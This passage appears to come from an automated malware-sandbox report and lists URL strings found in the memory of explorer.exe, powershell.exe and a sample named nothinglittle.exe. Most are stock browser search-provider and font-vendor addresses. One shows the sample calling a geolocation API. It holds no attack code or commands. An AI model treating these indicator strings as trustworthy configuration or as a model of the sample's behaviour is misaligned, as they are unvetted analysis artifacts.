Source: explorer.exe, 0000001D.00000000.460964779.000000000E8B3000.00000002.00000001.sdmp	String found in binary or memory: http://search.alice.it/favicon.ico
Source: explorer.exe, 0000001D.00000000.460964779.000000000E8B3000.00000002.00000001.sdmp	String found in binary or memory: http://search.aol.co.uk/
Source: explorer.exe, 0000001D.00000000.460964779.000000000E8B3000.00000002.00000001.sdmp	String found in binary or memory: http://search.aol.com/
Source: explorer.exe, 0000001D.00000000.460964779.000000000E8B3000.00000002.00000001.sdmp	String found in binary or memory: http://search.aol.in/
Source: explorer.exe, 0000001D.00000000.460964779.000000000E8B3000.00000002.00000001.sdmp	String found in binary or memory: http://search.atlas.cz/
Source: explorer.exe, 0000001D.00000000.460964779.000000000E8B3000.00000002.00000001.sdmp	String found in binary or memory: http://search.auction.co.kr/
Source: explorer.exe, 0000001D.00000000.460964779.000000000E8B3000.00000002.00000001.sdmp	String found in binary or memory: http://search.auone.jp/
Source: explorer.exe, 0000001D.00000000.460964779.000000000E8B3000.00000002.00000001.sdmp	String found in binary or memory: http://search.books.com.tw/
Source: explorer.exe, 0000001D.00000000.460964779.000000000E8B3000.00000002.00000001.sdmp	String found in binary or memory: http://search.books.com.tw/favicon.ico
Source: explorer.exe, 0000001D.00000000.460964779.000000000E8B3000.00000002.00000001.sdmp	String found in binary or memory: http://search.centrum.cz/
Source: explorer.exe, 0000001D.00000000.460964779.000000000E8B3000.00000002.00000001.sdmp	String found in binary or memory: http://search.centrum.cz/favicon.ico
Source: explorer.exe, 0000001D.00000000.460964779.000000000E8B3000.00000002.00000001.sdmp	String found in binary or memory: http://search.chol.com/
Source: explorer.exe, 0000001D.00000000.460964779.000000000E8B3000.00000002.00000001.sdmp	String found in binary or memory: http://search.chol.com/favicon.ico
Source: explorer.exe, 0000001D.00000000.460964779.000000000E8B3000.00000002.00000001.sdmp	String found in binary or memory: http://search.cn.yahoo.com/
Source: explorer.exe, 0000001D.00000000.460964779.000000000E8B3000.00000002.00000001.sdmp	String found in binary or memory: http://search.daum.net/
Source: explorer.exe, 0000001D.00000000.460964779.000000000E8B3000.00000002.00000001.sdmp	String found in binary or memory: http://search.daum.net/favicon.ico
Source: explorer.exe, 0000001D.00000000.460964779.000000000E8B3000.00000002.00000001.sdmp	String found in binary or memory: http://search.dreamwiz.com/
Source: explorer.exe, 0000001D.00000000.460964779.000000000E8B3000.00000002.00000001.sdmp	String found in binary or memory: http://search.dreamwiz.com/favicon.ico
Source: explorer.exe, 0000001D.00000000.460964779.000000000E8B3000.00000002.00000001.sdmp	String found in binary or memory: http://search.ebay.co.uk/
Source: explorer.exe, 0000001D.00000000.460964779.000000000E8B3000.00000002.00000001.sdmp	String found in binary or memory: http://search.ebay.com/
Source: explorer.exe, 0000001D.00000000.460964779.000000000E8B3000.00000002.00000001.sdmp	String found in binary or memory: http://search.ebay.com/favicon.ico
Source: explorer.exe, 0000001D.00000000.460964779.000000000E8B3000.00000002.00000001.sdmp	String found in binary or memory: http://search.ebay.de/
Source: explorer.exe, 0000001D.00000000.460964779.000000000E8B3000.00000002.00000001.sdmp	String found in binary or memory: http://search.ebay.es/
Source: explorer.exe, 0000001D.00000000.460964779.000000000E8B3000.00000002.00000001.sdmp	String found in binary or memory: http://search.ebay.fr/
Source: explorer.exe, 0000001D.00000000.460964779.000000000E8B3000.00000002.00000001.sdmp	String found in binary or memory: http://search.ebay.in/
Source: explorer.exe, 0000001D.00000000.460964779.000000000E8B3000.00000002.00000001.sdmp	String found in binary or memory: http://search.ebay.it/
Source: explorer.exe, 0000001D.00000000.460964779.000000000E8B3000.00000002.00000001.sdmp	String found in binary or memory: http://search.empas.com/
Source: explorer.exe, 0000001D.00000000.460964779.000000000E8B3000.00000002.00000001.sdmp	String found in binary or memory: http://search.empas.com/favicon.ico
Source: explorer.exe, 0000001D.00000000.460964779.000000000E8B3000.00000002.00000001.sdmp	String found in binary or memory: http://search.espn.go.com/
Source: explorer.exe, 0000001D.00000000.460964779.000000000E8B3000.00000002.00000001.sdmp	String found in binary or memory: http://search.gamer.com.tw/
Source: explorer.exe, 0000001D.00000000.460964779.000000000E8B3000.00000002.00000001.sdmp	String found in binary or memory: http://search.gamer.com.tw/favicon.ico
Source: explorer.exe, 0000001D.00000000.460964779.000000000E8B3000.00000002.00000001.sdmp	String found in binary or memory: http://search.gismeteo.ru/
Source: explorer.exe, 0000001D.00000000.460964779.000000000E8B3000.00000002.00000001.sdmp	String found in binary or memory: http://search.goo.ne.jp/
Source: explorer.exe, 0000001D.00000000.460964779.000000000E8B3000.00000002.00000001.sdmp	String found in binary or memory: http://search.goo.ne.jp/favicon.ico
Source: explorer.exe, 0000001D.00000000.460964779.000000000E8B3000.00000002.00000001.sdmp	String found in binary or memory: http://search.hanafos.com/
Source: explorer.exe, 0000001D.00000000.460964779.000000000E8B3000.00000002.00000001.sdmp	String found in binary or memory: http://search.hanafos.com/favicon.ico
Source: explorer.exe, 0000001D.00000000.460964779.000000000E8B3000.00000002.00000001.sdmp	String found in binary or memory: http://search.interpark.com/
Source: explorer.exe, 0000001D.00000000.460964779.000000000E8B3000.00000002.00000001.sdmp	String found in binary or memory: http://search.ipop.co.kr/
Source: explorer.exe, 0000001D.00000000.460964779.000000000E8B3000.00000002.00000001.sdmp	String found in binary or memory: http://search.ipop.co.kr/favicon.ico
Source: explorer.exe, 0000001D.00000000.460964779.000000000E8B3000.00000002.00000001.sdmp	String found in binary or memory: http://search.live.com/results.aspx?FORM=IEFM1&q=
Source: explorer.exe, 0000001D.00000000.460964779.000000000E8B3000.00000002.00000001.sdmp	String found in binary or memory: http://search.live.com/results.aspx?FORM=SO2TDF&q=
Source: explorer.exe, 0000001D.00000000.460964779.000000000E8B3000.00000002.00000001.sdmp	String found in binary or memory: http://search.live.com/results.aspx?FORM=SOLTDF&q=
Source: explorer.exe, 0000001D.00000000.460964779.000000000E8B3000.00000002.00000001.sdmp	String found in binary or memory: http://search.live.com/results.aspx?q=
Source: explorer.exe, 0000001D.00000000.460964779.000000000E8B3000.00000002.00000001.sdmp	String found in binary or memory: http://search.livedoor.com/
Source: explorer.exe, 0000001D.00000000.460964779.000000000E8B3000.00000002.00000001.sdmp	String found in binary or memory: http://search.livedoor.com/favicon.ico
Source: explorer.exe, 0000001D.00000000.460964779.000000000E8B3000.00000002.00000001.sdmp	String found in binary or memory: http://search.lycos.co.uk/
Source: explorer.exe, 0000001D.00000000.460964779.000000000E8B3000.00000002.00000001.sdmp	String found in binary or memory: http://search.lycos.com/
Source: explorer.exe, 0000001D.00000000.460964779.000000000E8B3000.00000002.00000001.sdmp	String found in binary or memory: http://search.lycos.com/favicon.ico
Source: explorer.exe, 0000001D.00000000.460964779.000000000E8B3000.00000002.00000001.sdmp	String found in binary or memory: http://search.msn.co.jp/results.aspx?q=
Source: explorer.exe, 0000001D.00000000.460964779.000000000E8B3000.00000002.00000001.sdmp	String found in binary or memory: http://search.msn.co.uk/results.aspx?q=
Source: explorer.exe, 0000001D.00000000.460964779.000000000E8B3000.00000002.00000001.sdmp	String found in binary or memory: http://search.msn.com.cn/results.aspx?q=
Source: explorer.exe, 0000001D.00000000.460964779.000000000E8B3000.00000002.00000001.sdmp	String found in binary or memory: http://search.msn.com/results.aspx?q=
Source: explorer.exe, 0000001D.00000000.460964779.000000000E8B3000.00000002.00000001.sdmp	String found in binary or memory: http://search.nate.com/
Source: explorer.exe, 0000001D.00000000.460964779.000000000E8B3000.00000002.00000001.sdmp	String found in binary or memory: http://search.naver.com/
Source: explorer.exe, 0000001D.00000000.460964779.000000000E8B3000.00000002.00000001.sdmp	String found in binary or memory: http://search.naver.com/favicon.ico
Source: explorer.exe, 0000001D.00000000.460964779.000000000E8B3000.00000002.00000001.sdmp	String found in binary or memory: http://search.nifty.com/
Source: explorer.exe, 0000001D.00000000.460964779.000000000E8B3000.00000002.00000001.sdmp	String found in binary or memory: http://search.orange.co.uk/
Source: explorer.exe, 0000001D.00000000.460964779.000000000E8B3000.00000002.00000001.sdmp	String found in binary or memory: http://search.orange.co.uk/favicon.ico
Source: explorer.exe, 0000001D.00000000.460964779.000000000E8B3000.00000002.00000001.sdmp	String found in binary or memory: http://search.rediff.com/
Source: explorer.exe, 0000001D.00000000.460964779.000000000E8B3000.00000002.00000001.sdmp	String found in binary or memory: http://search.rediff.com/favicon.ico
Source: explorer.exe, 0000001D.00000000.460964779.000000000E8B3000.00000002.00000001.sdmp	String found in binary or memory: http://search.seznam.cz/
Source: explorer.exe, 0000001D.00000000.460964779.000000000E8B3000.00000002.00000001.sdmp	String found in binary or memory: http://search.seznam.cz/favicon.ico
Source: explorer.exe, 0000001D.00000000.460964779.000000000E8B3000.00000002.00000001.sdmp	String found in binary or memory: http://search.sify.com/
Source: explorer.exe, 0000001D.00000000.460964779.000000000E8B3000.00000002.00000001.sdmp	String found in binary or memory: http://search.yahoo.co.jp
Source: explorer.exe, 0000001D.00000000.460964779.000000000E8B3000.00000002.00000001.sdmp	String found in binary or memory: http://search.yahoo.co.jp/favicon.ico
Source: explorer.exe, 0000001D.00000000.460964779.000000000E8B3000.00000002.00000001.sdmp	String found in binary or memory: http://search.yahoo.com/
Source: explorer.exe, 0000001D.00000000.460964779.000000000E8B3000.00000002.00000001.sdmp	String found in binary or memory: http://search.yahoo.com/favicon.ico
Source: explorer.exe, 0000001D.00000000.460964779.000000000E8B3000.00000002.00000001.sdmp	String found in binary or memory: http://search.yahooapis.jp/AssistSearchService/V2/webassistSearch?output=iejson&p=
Source: explorer.exe, 0000001D.00000000.460964779.000000000E8B3000.00000002.00000001.sdmp	String found in binary or memory: http://search.yam.com/
Source: explorer.exe, 0000001D.00000000.460964779.000000000E8B3000.00000002.00000001.sdmp	String found in binary or memory: http://search1.taobao.com/
Source: explorer.exe, 0000001D.00000000.460964779.000000000E8B3000.00000002.00000001.sdmp	String found in binary or memory: http://search2.estadao.com.br/
Source: explorer.exe, 0000001D.00000000.460964779.000000000E8B3000.00000002.00000001.sdmp	String found in binary or memory: http://searchresults.news.com.au/
Source: explorer.exe, 0000001D.00000000.460964779.000000000E8B3000.00000002.00000001.sdmp	String found in binary or memory: http://service2.bfast.com/
Source: explorer.exe, 0000001D.00000000.460964779.000000000E8B3000.00000002.00000001.sdmp	String found in binary or memory: http://sitesearch.timesonline.co.uk/
Source: explorer.exe, 0000001D.00000000.460964779.000000000E8B3000.00000002.00000001.sdmp	String found in binary or memory: http://so-net.search.goo.ne.jp/
Source: explorer.exe, 0000001D.00000000.460964779.000000000E8B3000.00000002.00000001.sdmp	String found in binary or memory: http://suche.aol.de/
Source: explorer.exe, 0000001D.00000000.460964779.000000000E8B3000.00000002.00000001.sdmp	String found in binary or memory: http://suche.freenet.de/
Source: explorer.exe, 0000001D.00000000.460964779.000000000E8B3000.00000002.00000001.sdmp	String found in binary or memory: http://suche.freenet.de/favicon.ico
Source: explorer.exe, 0000001D.00000000.460964779.000000000E8B3000.00000002.00000001.sdmp	String found in binary or memory: http://suche.lycos.de/
Source: explorer.exe, 0000001D.00000000.460964779.000000000E8B3000.00000002.00000001.sdmp	String found in binary or memory: http://suche.t-online.de/
Source: explorer.exe, 0000001D.00000000.460964779.000000000E8B3000.00000002.00000001.sdmp	String found in binary or memory: http://suche.web.de/
Source: explorer.exe, 0000001D.00000000.460964779.000000000E8B3000.00000002.00000001.sdmp	String found in binary or memory: http://suche.web.de/favicon.ico
Source: explorer.exe, 0000001D.00000000.460487626.000000000E7C0000.00000002.00000001.sdmp	String found in binary or memory: http://treyresearch.net
Source: explorer.exe, 0000001D.00000000.460964779.000000000E8B3000.00000002.00000001.sdmp	String found in binary or memory: http://tw.search.yahoo.com/
Source: explorer.exe, 0000001D.00000000.460964779.000000000E8B3000.00000002.00000001.sdmp	String found in binary or memory: http://udn.com/
Source: explorer.exe, 0000001D.00000000.460964779.000000000E8B3000.00000002.00000001.sdmp	String found in binary or memory: http://udn.com/favicon.ico
Source: explorer.exe, 0000001D.00000000.460964779.000000000E8B3000.00000002.00000001.sdmp	String found in binary or memory: http://uk.ask.com/
Source: explorer.exe, 0000001D.00000000.460964779.000000000E8B3000.00000002.00000001.sdmp	String found in binary or memory: http://uk.ask.com/favicon.ico
Source: explorer.exe, 0000001D.00000000.460964779.000000000E8B3000.00000002.00000001.sdmp	String found in binary or memory: http://uk.search.yahoo.com/
Source: nothinglittle.exe	String found in binary or memory: http://us1.unwiredlabs.com/v2/process.php
Source: nothinglittle.exe.9.dr	String found in binary or memory: http://us1.unwiredlabs.com/v2/process.php?application/json;
Source: explorer.exe, 0000001D.00000000.460964779.000000000E8B3000.00000002.00000001.sdmp	String found in binary or memory: http://vachercher.lycos.fr/
Source: explorer.exe, 0000001D.00000000.460964779.000000000E8B3000.00000002.00000001.sdmp	String found in binary or memory: http://video.globo.com/
Source: explorer.exe, 0000001D.00000000.460964779.000000000E8B3000.00000002.00000001.sdmp	String found in binary or memory: http://video.globo.com/favicon.ico
Source: 26C2BCD2-E8F6-49A5-B037-8B38394825D2.0.dr	String found in binary or memory: http://weather.service.msn.com/data.aspx
Source: explorer.exe, 0000001D.00000000.460964779.000000000E8B3000.00000002.00000001.sdmp	String found in binary or memory: http://web.ask.com/
Source: explorer.exe, 0000001D.00000000.460487626.000000000E7C0000.00000002.00000001.sdmp	String found in binary or memory: http://www.%s.com
Source: explorer.exe, 0000001D.00000000.460964779.000000000E8B3000.00000002.00000001.sdmp	String found in binary or memory: http://www.abril.com.br/
Source: explorer.exe, 0000001D.00000000.460964779.000000000E8B3000.00000002.00000001.sdmp	String found in binary or memory: http://www.abril.com.br/favicon.ico
Source: explorer.exe, 0000001D.00000000.460964779.000000000E8B3000.00000002.00000001.sdmp	String found in binary or memory: http://www.afisha.ru/App_Themes/Default/images/favicon.ico
Source: explorer.exe, 0000001D.00000000.460964779.000000000E8B3000.00000002.00000001.sdmp	String found in binary or memory: http://www.alarabiya.net/
Source: explorer.exe, 0000001D.00000000.460964779.000000000E8B3000.00000002.00000001.sdmp	String found in binary or memory: http://www.alarabiya.net/favicon.ico
Source: explorer.exe, 0000001D.00000000.460964779.000000000E8B3000.00000002.00000001.sdmp	String found in binary or memory: http://www.amazon.co.jp/
Source: explorer.exe, 0000001D.00000000.460964779.000000000E8B3000.00000002.00000001.sdmp	String found in binary or memory: http://www.amazon.co.uk/
Source: explorer.exe, 0000001D.00000000.460964779.000000000E8B3000.00000002.00000001.sdmp	String found in binary or memory: http://www.amazon.com/exec/obidos/external-search/104-2981279-3455918?index=blended&keyword=
Source: explorer.exe, 0000001D.00000000.460964779.000000000E8B3000.00000002.00000001.sdmp	String found in binary or memory: http://www.amazon.com/favicon.ico
Source: explorer.exe, 0000001D.00000000.460964779.000000000E8B3000.00000002.00000001.sdmp	String found in binary or memory: http://www.amazon.com/gp/search?ie=UTF8&tag=ie8search-20&index=blended&linkCode=qs&c
Source: explorer.exe, 0000001D.00000000.460964779.000000000E8B3000.00000002.00000001.sdmp	String found in binary or memory: http://www.amazon.de/
Source: explorer.exe, 0000001D.00000000.460964779.000000000E8B3000.00000002.00000001.sdmp	String found in binary or memory: http://www.aol.com/favicon.ico
Source: explorer.exe, 0000001D.00000000.458516222.0000000008B46000.00000002.00000001.sdmp	String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
Source: powershell.exe, 00000001.00000002.283225202.00000000050E1000.00000004.00000001.sdmp	String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: explorer.exe, 0000001D.00000000.460964779.000000000E8B3000.00000002.00000001.sdmp	String found in binary or memory: http://www.arrakis.com/
Source: explorer.exe, 0000001D.00000000.460964779.000000000E8B3000.00000002.00000001.sdmp	String found in binary or memory: http://www.arrakis.com/favicon.ico
Source: explorer.exe, 0000001D.00000000.460964779.000000000E8B3000.00000002.00000001.sdmp	String found in binary or memory: http://www.asharqalawsat.com/
Source: explorer.exe, 0000001D.00000000.460964779.000000000E8B3000.00000002.00000001.sdmp	String found in binary or memory: http://www.asharqalawsat.com/favicon.ico
Source: explorer.exe, 0000001D.00000000.460964779.000000000E8B3000.00000002.00000001.sdmp	String found in binary or memory: http://www.ask.com/
Source: explorer.exe, 0000001D.00000000.460964779.000000000E8B3000.00000002.00000001.sdmp	String found in binary or memory: http://www.auction.co.kr/auction.ico
Source: explorer.exe, 0000001D.00000000.460964779.000000000E8B3000.00000002.00000001.sdmp	String found in binary or memory: http://www.baidu.com/
Source: explorer.exe, 0000001D.00000000.460964779.000000000E8B3000.00000002.00000001.sdmp	String found in binary or memory: http://www.baidu.com/favicon.ico
Source: explorer.exe, 0000001D.00000000.458516222.0000000008B46000.00000002.00000001.sdmp	String found in binary or memory: http://www.carterandcone.coml
Source: explorer.exe, 0000001D.00000000.460964779.000000000E8B3000.00000002.00000001.sdmp	String found in binary or memory: http://www.cdiscount.com/
Source: explorer.exe, 0000001D.00000000.460964779.000000000E8B3000.00000002.00000001.sdmp	String found in binary or memory: http://www.cdiscount.com/favicon.ico
Source: explorer.exe, 0000001D.00000000.460964779.000000000E8B3000.00000002.00000001.sdmp	String found in binary or memory: http://www.ceneo.pl/
Source: explorer.exe, 0000001D.00000000.460964779.000000000E8B3000.00000002.00000001.sdmp	String found in binary or memory: http://www.ceneo.pl/favicon.ico
Source: explorer.exe, 0000001D.00000000.460964779.000000000E8B3000.00000002.00000001.sdmp	String found in binary or memory: http://www.chennaionline.com/ncommon/images/collogo.ico
Source: explorer.exe, 0000001D.00000000.460964779.000000000E8B3000.00000002.00000001.sdmp	String found in binary or memory: http://www.cjmall.com/
Source: explorer.exe, 0000001D.00000000.460964779.000000000E8B3000.00000002.00000001.sdmp	String found in binary or memory: http://www.cjmall.com/favicon.ico
Source: explorer.exe, 0000001D.00000000.460964779.000000000E8B3000.00000002.00000001.sdmp	String found in binary or memory: http://www.clarin.com/favicon.ico
Source: explorer.exe, 0000001D.00000000.460964779.000000000E8B3000.00000002.00000001.sdmp	String found in binary or memory: http://www.cnet.co.uk/
Source: explorer.exe, 0000001D.00000000.460964779.000000000E8B3000.00000002.00000001.sdmp	String found in binary or memory: http://www.cnet.com/favicon.ico
Source: explorer.exe, 0000001D.00000000.460964779.000000000E8B3000.00000002.00000001.sdmp	String found in binary or memory: http://www.dailymail.co.uk/
Source: explorer.exe, 0000001D.00000000.460964779.000000000E8B3000.00000002.00000001.sdmp	String found in binary or memory: http://www.dailymail.co.uk/favicon.ico
Source: explorer.exe, 0000001D.00000000.460964779.000000000E8B3000.00000002.00000001.sdmp	String found in binary or memory: http://www.docUrl.com/bar.htm
Source: explorer.exe, 0000001D.00000000.460964779.000000000E8B3000.00000002.00000001.sdmp	String found in binary or memory: http://www.etmall.com.tw/
Source: explorer.exe, 0000001D.00000000.460964779.000000000E8B3000.00000002.00000001.sdmp	String found in binary or memory: http://www.etmall.com.tw/favicon.ico
Source: explorer.exe, 0000001D.00000000.460964779.000000000E8B3000.00000002.00000001.sdmp	String found in binary or memory: http://www.excite.co.jp/
Source: explorer.exe, 0000001D.00000000.460964779.000000000E8B3000.00000002.00000001.sdmp	String found in binary or memory: http://www.expedia.com/
Source: explorer.exe, 0000001D.00000000.460964779.000000000E8B3000.00000002.00000001.sdmp	String found in binary or memory: http://www.expedia.com/favicon.ico
Source: explorer.exe, 0000001D.00000000.458516222.0000000008B46000.00000002.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com
Source: explorer.exe, 0000001D.00000000.458516222.0000000008B46000.00000002.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com/designers
Source: explorer.exe, 0000001D.00000000.458516222.0000000008B46000.00000002.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com/designers/?
Source: explorer.exe, 0000001D.00000000.458516222.0000000008B46000.00000002.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
Source: explorer.exe, 0000001D.00000000.458516222.0000000008B46000.00000002.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com/designers/frere-jones.html
Source: explorer.exe, 0000001D.00000000.458516222.0000000008B46000.00000002.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com/designers8
Source: explorer.exe, 0000001D.00000000.458516222.0000000008B46000.00000002.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com/designers?
Source: explorer.exe, 0000001D.00000000.458516222.0000000008B46000.00000002.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com/designersG
Source: explorer.exe, 0000001D.00000000.458516222.0000000008B46000.00000002.00000001.sdmp	String found in binary or memory: http://www.fonts.com
Source: explorer.exe, 0000001D.00000000.458516222.0000000008B46000.00000002.00000001.sdmp	String found in binary or memory: http://www.founder.com.cn/cn
Source: explorer.exe, 0000001D.00000000.458516222.0000000008B46000.00000002.00000001.sdmp	String found in binary or memory: http://www.founder.com.cn/cn/bThe
Source: explorer.exe, 0000001D.00000000.458516222.0000000008B46000.00000002.00000001.sdmp	String found in binary or memory: http://www.founder.com.cn/cn/cThe
Source: explorer.exe, 0000001D.00000000.458516222.0000000008B46000.00000002.00000001.sdmp	String found in binary or memory: http://www.galapagosdesign.com/DPlease
Source: explorer.exe, 0000001D.00000000.458516222.0000000008B46000.00000002.00000001.sdmp	String found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
Source: explorer.exe, 0000001D.00000000.460964779.000000000E8B3000.00000002.00000001.sdmp	String found in binary or memory: http://www.gismeteo.ru/favicon.ico
Source: explorer.exe, 0000001D.00000000.460964779.000000000E8B3000.00000002.00000001.sdmp	String found in binary or memory: http://www.gmarket.co.kr/
Source: explorer.exe, 0000001D.00000000.460964779.000000000E8B3000.00000002.00000001.sdmp	String found in binary or memory: http://www.gmarket.co.kr/favicon.ico
Source: explorer.exe, 0000001D.00000000.458516222.0000000008B46000.00000002.00000001.sdmp	String found in binary or memory: http://www.goodfont.co.kr
Source: explorer.exe, 0000001D.00000000.460964779.000000000E8B3000.00000002.00000001.sdmp	String found in binary or memory: http://www.google.co.in/
Source: explorer.exe, 0000001D.00000000.460964779.000000000E8B3000.00000002.00000001.sdmp	String found in binary or memory: http://www.google.co.jp/
Source: explorer.exe, 0000001D.00000000.460964779.000000000E8B3000.00000002.00000001.sdmp	String found in binary or memory: http://www.google.co.uk/
Source: explorer.exe, 0000001D.00000000.460964779.000000000E8B3000.00000002.00000001.sdmp	String found in binary or memory: http://www.google.com.br/
Source: explorer.exe, 0000001D.00000000.460964779.000000000E8B3000.00000002.00000001.sdmp	String found in binary or memory: http://www.google.com.sa/
Source: explorer.exe, 0000001D.00000000.460964779.000000000E8B3000.00000002.00000001.sdmp	String found in binary or memory: http://www.google.com.tw/
Source: explorer.exe, 0000001D.00000000.460964779.000000000E8B3000.00000002.00000001.sdmp	String found in binary or memory: http://www.google.com/
Source: explorer.exe, 0000001D.00000000.460964779.000000000E8B3000.00000002.00000001.sdmp	String found in binary or memory: http://www.google.com/favicon.ico
Source: explorer.exe, 0000001D.00000000.460964779.000000000E8B3000.00000002.00000001.sdmp	String found in binary or memory: http://www.google.cz/
Source: explorer.exe, 0000001D.00000000.460964779.000000000E8B3000.00000002.00000001.sdmp	String found in binary or memory: http://www.google.de/
Source: explorer.exe, 0000001D.00000000.460964779.000000000E8B3000.00000002.00000001.sdmp	String found in binary or memory: http://www.google.es/
Source: explorer.exe, 0000001D.00000000.460964779.000000000E8B3000.00000002.00000001.sdmp	String found in binary or memory: http://www.google.fr/
Source: explorer.exe, 0000001D.00000000.460964779.000000000E8B3000.00000002.00000001.sdmp	String found in binary or memory: http://www.google.it/
Source: explorer.exe, 0000001D.00000000.460964779.000000000E8B3000.00000002.00000001.sdmp	String found in binary or memory: http://www.google.pl/
Source: explorer.exe, 0000001D.00000000.460964779.000000000E8B3000.00000002.00000001.sdmp	String found in binary or memory: http://www.google.ru/
Source: explorer.exe, 0000001D.00000000.460964779.000000000E8B3000.00000002.00000001.sdmp	String found in binary or memory: http://www.google.si/
Source: explorer.exe, 0000001D.00000000.460964779.000000000E8B3000.00000002.00000001.sdmp	String found in binary or memory: http://www.iask.com/
Source: explorer.exe, 0000001D.00000000.460964779.000000000E8B3000.00000002.00000001.sdmp	String found in binary or memory: http://www.iask.com/favicon.ico
Source: explorer.exe, 0000001D.00000000.458516222.0000000008B46000.00000002.00000001.sdmp	String found in binary or memory: http://www.jiyu-kobo.co.jp/
Source: explorer.exe, 0000001D.00000000.460964779.000000000E8B3000.00000002.00000001.sdmp	String found in binary or memory: http://www.kkbox.com.tw/
Source: explorer.exe, 0000001D.00000000.460964779.000000000E8B3000.00000002.00000001.sdmp	String found in binary or memory: http://www.kkbox.com.tw/favicon.ico
Source: explorer.exe, 0000001D.00000000.460964779.000000000E8B3000.00000002.00000001.sdmp	String found in binary or memory: http://www.linternaute.com/favicon.ico
Source: explorer.exe, 0000001D.00000000.460964779.000000000E8B3000.00000002.00000001.sdmp	String found in binary or memory: http://www.maktoob.com/favicon.ico
Source: explorer.exe, 0000001D.00000000.460964779.000000000E8B3000.00000002.00000001.sdmp	String found in binary or memory: http://www.mercadolibre.com.mx/
Source: explorer.exe, 0000001D.00000000.460964779.000000000E8B3000.00000002.00000001.sdmp	String found in binary or memory: http://www.mercadolibre.com.mx/favicon.ico
Source: explorer.exe, 0000001D.00000000.460964779.000000000E8B3000.00000002.00000001.sdmp	String found in binary or memory: http://www.mercadolivre.com.br/
Source: explorer.exe, 0000001D.00000000.460964779.000000000E8B3000.00000002.00000001.sdmp	String found in binary or memory: http://www.mercadolivre.com.br/favicon.ico
Source: explorer.exe, 0000001D.00000000.460964779.000000000E8B3000.00000002.00000001.sdmp	String found in binary or memory: http://www.merlin.com.pl/
Source: explorer.exe, 0000001D.00000000.460964779.000000000E8B3000.00000002.00000001.sdmp	String found in binary or memory: http://www.merlin.com.pl/favicon.ico
Source: explorer.exe, 0000001D.00000000.460964779.000000000E8B3000.00000002.00000001.sdmp	String found in binary or memory: http://www.microsofttranslator.com/?ref=IE8Activity
Source: explorer.exe, 0000001D.00000000.460964779.000000000E8B3000.00000002.00000001.sdmp	String found in binary or memory: http://www.microsofttranslator.com/BV.aspx?ref=IE8Activity&a=
Source: explorer.exe, 0000001D.00000000.460964779.000000000E8B3000.00000002.00000001.sdmp	String found in binary or memory: http://www.microsofttranslator.com/BVPrev.aspx?ref=IE8Activity
Source: explorer.exe, 0000001D.00000000.460964779.000000000E8B3000.00000002.00000001.sdmp	String found in binary or memory: http://www.microsofttranslator.com/Default.aspx?ref=IE8Activity
Source: explorer.exe, 0000001D.00000000.460964779.000000000E8B3000.00000002.00000001.sdmp	String found in binary or memory: http://www.microsofttranslator.com/DefaultPrev.aspx?ref=IE8Activity
Source: explorer.exe, 0000001D.00000000.462382336.000000000F747000.00000004.00000001.sdmp	String found in binary or memory: http://www.msn.com/?ocid=iehp1
Source: explorer.exe, 0000001D.00000000.462382336.000000000F747000.00000004.00000001.sdmp	String found in binary or memory: http://www.msn.com/?ocid=iehpg
Source: explorer.exe, 0000001D.00000000.462382336.000000000F747000.00000004.00000001.sdmp	String found in binary or memory: http://www.msn.com/de-ch/?ocid=iehp
Source: explorer.exe, 0000001D.00000000.462382336.000000000F747000.00000004.00000001.sdmp	String found in binary or memory: http://www.msn.com/de-ch/?ocid=iehpT
Source: explorer.exe, 0000001D.00000000.460964779.000000000E8B3000.00000002.00000001.sdmp	String found in binary or memory: http://www.mtv.com/
Source: explorer.exe, 0000001D.00000000.460964779.000000000E8B3000.00000002.00000001.sdmp	String found in binary or memory: http://www.mtv.com/favicon.ico
Source: explorer.exe, 0000001D.00000000.460964779.000000000E8B3000.00000002.00000001.sdmp	String found in binary or memory: http://www.myspace.com/favicon.ico
Source: explorer.exe, 0000001D.00000000.460964779.000000000E8B3000.00000002.00000001.sdmp	String found in binary or memory: http://www.najdi.si/
Source: explorer.exe, 0000001D.00000000.460964779.000000000E8B3000.00000002.00000001.sdmp	String found in binary or memory: http://www.najdi.si/favicon.ico
Source: explorer.exe, 0000001D.00000000.460964779.000000000E8B3000.00000002.00000001.sdmp	String found in binary or memory: http://www.nate.com/favicon.ico
Source: explorer.exe, 0000001D.00000000.460964779.000000000E8B3000.00000002.00000001.sdmp	String found in binary or memory: http://www.neckermann.de/
Source: explorer.exe, 0000001D.00000000.460964779.000000000E8B3000.00000002.00000001.sdmp	String found in binary or memory: http://www.neckermann.de/favicon.ico
Source: explorer.exe, 0000001D.00000000.460964779.000000000E8B3000.00000002.00000001.sdmp	String found in binary or memory: http://www.news.com.au/favicon.ico
Source: explorer.exe, 0000001D.00000000.460964779.000000000E8B3000.00000002.00000001.sdmp	String found in binary or memory: http://www.nifty.com/favicon.ico
Source: explorer.exe, 0000001D.00000000.460964779.000000000E8B3000.00000002.00000001.sdmp	String found in binary or memory: http://www.ocn.ne.jp/favicon.ico
Source: explorer.exe, 0000001D.00000000.460964779.000000000E8B3000.00000002.00000001.sdmp	String found in binary or memory: http://www.orange.fr/
Source: explorer.exe, 0000001D.00000000.460964779.000000000E8B3000.00000002.00000001.sdmp	String found in binary or memory: http://www.otto.de/favicon.ico
Source: explorer.exe, 0000001D.00000000.460964779.000000000E8B3000.00000002.00000001.sdmp	String found in binary or memory: http://www.ozon.ru/
Source: explorer.exe, 0000001D.00000000.460964779.000000000E8B3000.00000002.00000001.sdmp	String found in binary or memory: http://www.ozon.ru/favicon.ico
Source: explorer.exe, 0000001D.00000000.460964779.000000000E8B3000.00000002.00000001.sdmp	String found in binary or memory: http://www.ozu.es/favicon.ico
Source: explorer.exe, 0000001D.00000000.460964779.000000000E8B3000.00000002.00000001.sdmp	String found in binary or memory: http://www.paginasamarillas.es/
Source: explorer.exe, 0000001D.00000000.460964779.000000000E8B3000.00000002.00000001.sdmp	String found in binary or memory: http://www.paginasamarillas.es/favicon.ico
